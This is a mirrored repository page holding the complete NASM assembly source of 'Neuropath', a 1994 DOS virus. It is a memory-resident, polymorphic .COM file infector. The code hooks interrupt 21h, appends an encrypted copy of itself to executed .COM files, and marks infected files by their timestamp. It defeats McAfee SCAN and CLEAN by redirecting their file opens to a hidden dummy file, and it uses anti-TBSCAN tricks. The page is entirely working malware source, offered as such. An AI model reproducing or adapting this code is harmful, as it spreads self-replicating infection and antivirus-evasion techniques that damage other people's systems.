mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
287 lines
7.7 KiB
NASM
287 lines
7.7 KiB
NASM
|
; ========================================================================>
|
||
|
; [Neuropath] by MnemoniX 1994
|
||
|
;
|
||
|
; * Memory resident .COM infector
|
||
|
; * Polymorphic (engine in neuroeng.asm - lame but effective)
|
||
|
; * Anti-SCAN and CLEAN stealth technique - creates hidden file in
|
||
|
; root directory; when SCAN or CLEAN is run all attempts to open .COM
|
||
|
; files are redirected to hidden file, and they all come out clean.
|
||
|
; ========================================================================>
|
||
|
|
||
|
code segment
|
||
|
org 0
|
||
|
assume cs:code
|
||
|
|
||
|
start:
|
||
|
db 0E9h,0,0
|
||
|
|
||
|
virus_begin:
|
||
|
call $ + 3
|
||
|
pop bp
|
||
|
sub bp,offset $ - 1
|
||
|
|
||
|
mov ah,3Ch
|
||
|
mov cx,2
|
||
|
lea dx,[bp + dummy_file] ; create dummy file
|
||
|
int 21h
|
||
|
|
||
|
mov ah,3Eh
|
||
|
int 21h
|
||
|
|
||
|
install:
|
||
|
mov ax,5786h
|
||
|
int 21h
|
||
|
|
||
|
push ds es
|
||
|
|
||
|
mov ax,ds
|
||
|
dec ax
|
||
|
mov ds,ax
|
||
|
|
||
|
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||
|
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||
|
mov es,word ptr ds:[12h]
|
||
|
|
||
|
push cs ; copy virus into memory
|
||
|
pop ds
|
||
|
xor di,di
|
||
|
mov si,bp
|
||
|
mov cx,(virus_end - start) / 2 + 1
|
||
|
rep movsw
|
||
|
|
||
|
xor ax,ax ; capture interrupt 21
|
||
|
mov ds,ax
|
||
|
|
||
|
mov si,21h * 4
|
||
|
mov di,offset old_int_21
|
||
|
movsw
|
||
|
movsw
|
||
|
|
||
|
mov word ptr [si - 4],offset new_int_21
|
||
|
mov [si - 2],es
|
||
|
|
||
|
pop es ds
|
||
|
jmp install
|
||
|
|
||
|
int_21:
|
||
|
pushf
|
||
|
call dword ptr cs:[old_int_21]
|
||
|
ret
|
||
|
|
||
|
new_int_21:
|
||
|
cmp ax,5786h
|
||
|
je restore_host
|
||
|
|
||
|
cmp ah,4Ch
|
||
|
je terminate
|
||
|
|
||
|
cmp ah,3Dh
|
||
|
je file_open
|
||
|
|
||
|
not ax
|
||
|
cmp ax,0B4FFh
|
||
|
je execute
|
||
|
int_21_4B_exit:
|
||
|
not ax
|
||
|
|
||
|
int_21_exit:
|
||
|
db 0EAh
|
||
|
old_int_21 dd 0
|
||
|
|
||
|
restore_host:
|
||
|
pop ax
|
||
|
pop ax
|
||
|
|
||
|
push ds
|
||
|
mov di,0FEFFh
|
||
|
not di
|
||
|
|
||
|
lea si,[bp + host]
|
||
|
push di
|
||
|
movsw
|
||
|
movsb
|
||
|
|
||
|
iret
|
||
|
|
||
|
terminate:
|
||
|
mov cs:McAffee_alert,0
|
||
|
jmp int_21_exit
|
||
|
|
||
|
file_open:
|
||
|
cmp cs:McAffee_alert,1
|
||
|
jne int_21_exit
|
||
|
|
||
|
push ax si
|
||
|
mov si,dx
|
||
|
|
||
|
find_ext:
|
||
|
lodsb
|
||
|
cmp al,'.'
|
||
|
je ext_found
|
||
|
test al,al
|
||
|
je not_com
|
||
|
jmp find_ext
|
||
|
|
||
|
ext_found:
|
||
|
cmp ds:[si],'OC' ; .COM?
|
||
|
jne not_com
|
||
|
cmp byte ptr ds:[si + 2],'M'
|
||
|
jne not_com
|
||
|
|
||
|
pop si ax
|
||
|
push ds dx
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov dx,offset dummy_file
|
||
|
call int_21
|
||
|
|
||
|
pop dx ds
|
||
|
retf 2
|
||
|
not_com:
|
||
|
pop si ax
|
||
|
jmp int_21_exit
|
||
|
|
||
|
execute:
|
||
|
push ax si
|
||
|
mov si,dx
|
||
|
|
||
|
find_ext_2:
|
||
|
lodsb
|
||
|
cmp al,'.'
|
||
|
je ext_found_2
|
||
|
test al,al
|
||
|
je no_scan
|
||
|
jmp find_ext_2
|
||
|
ext_found_2:
|
||
|
cmp ds:[si],'XE' ; check for SCAN.EXE
|
||
|
jne no_scan
|
||
|
cmp ds:[si - 3],'NA'
|
||
|
jne no_scan
|
||
|
cmp ds:[si - 5],'CS'
|
||
|
jne perhaps_clean
|
||
|
mcaffee_on:
|
||
|
pop si ax
|
||
|
mov cs:McAffee_alert,1 ; McAffee alert!
|
||
|
jmp int_21_4B_exit
|
||
|
|
||
|
perhaps_clean:
|
||
|
cmp ds:[si - 5],'EL' ; check for CLEAN.EXE
|
||
|
jne no_scan
|
||
|
cmp byte ptr ds:[si - 6],'C'
|
||
|
je mcaffee_on
|
||
|
no_scan:
|
||
|
pop si ax
|
||
|
push ax bx cx dx si di bp ds es
|
||
|
|
||
|
mov ax,3D00h
|
||
|
call int_21
|
||
|
jnc check_out
|
||
|
jmp cant_open
|
||
|
check_out:
|
||
|
xchg ax,bx
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
|
||
|
push bx
|
||
|
mov ax,ds:sft_1
|
||
|
int 2Fh
|
||
|
|
||
|
mov ax,ds:sft_2
|
||
|
mov bl,es:[di]
|
||
|
int 2Fh
|
||
|
pop bx
|
||
|
|
||
|
mov word ptr es:[di + 2],2
|
||
|
|
||
|
mov ax,es:[di + 0Dh]
|
||
|
and al,31
|
||
|
cmp al,24 ; marker is 24
|
||
|
je dont_infect
|
||
|
|
||
|
mov ah,ds:file_read ; anti-TBSCAN
|
||
|
mov dx,offset host
|
||
|
mov cx,3
|
||
|
call int_21
|
||
|
|
||
|
mov ax,word ptr ds:host
|
||
|
sub ax,'ZM'
|
||
|
je dont_infect
|
||
|
|
||
|
mov ax,es:[di + 11h] ; file size
|
||
|
cmp ax,65278 - VIRUS_SIZE
|
||
|
jae dont_infect
|
||
|
|
||
|
mov es:[di + 15h],ax
|
||
|
sub ax,3
|
||
|
mov word ptr ds:new_jump + 1,ax
|
||
|
|
||
|
push es di bx
|
||
|
add ax,103h
|
||
|
xchg dx,ax
|
||
|
mov cx,VIRUS_SIZE
|
||
|
mov si,offset virus_begin
|
||
|
mov di,offset encrypt_buffer
|
||
|
|
||
|
push cs
|
||
|
pop es
|
||
|
|
||
|
call engine
|
||
|
pop bx di es
|
||
|
|
||
|
mov dx,offset encrypt_buffer
|
||
|
call write_it
|
||
|
|
||
|
mov word ptr es:[di + 15h],0
|
||
|
mov cx,3
|
||
|
mov dx,offset new_jump
|
||
|
call write_it
|
||
|
|
||
|
dont_infect:
|
||
|
mov ax,ds:set_date ; anti-TBSCAN
|
||
|
mov cx,es:[di + 0Dh]
|
||
|
mov dx,es:[di + 0Fh]
|
||
|
and cl,-32
|
||
|
or cl,24
|
||
|
call int_21
|
||
|
|
||
|
mov ah,3Eh
|
||
|
call int_21
|
||
|
cant_open:
|
||
|
pop es ds bp di si dx cx bx ax
|
||
|
jmp int_21_4B_exit
|
||
|
|
||
|
write_it:
|
||
|
mov ah,ds:file_write ; anti-TBSCAN
|
||
|
call int_21
|
||
|
ret
|
||
|
|
||
|
db '[Neuropath] MnemoniX',0
|
||
|
|
||
|
dummy_file db '\',-1,-1,0 ; 2 ASCII 255s
|
||
|
|
||
|
include neuroeng.asm
|
||
|
|
||
|
McAffee_alert db 0
|
||
|
host db 0CDh,20h,0
|
||
|
new_jump db 0E9h,0,0
|
||
|
|
||
|
set_date dw 5701h
|
||
|
file_read db 3Fh
|
||
|
file_write db 40h
|
||
|
sft_1 dw 1220h
|
||
|
sft_2 dw 1216h
|
||
|
|
||
|
virus_end:
|
||
|
VIRUS_SIZE equ virus_end - virus_begin
|
||
|
|
||
|
encrypt_buffer db VIRUS_SIZE + 1000 dup (?)
|
||
|
|
||
|
heap_end:
|
||
|
|
||
|
MEM_SIZE equ heap_end - start
|
||
|
|
||
|
code ends
|
||
|
end start
|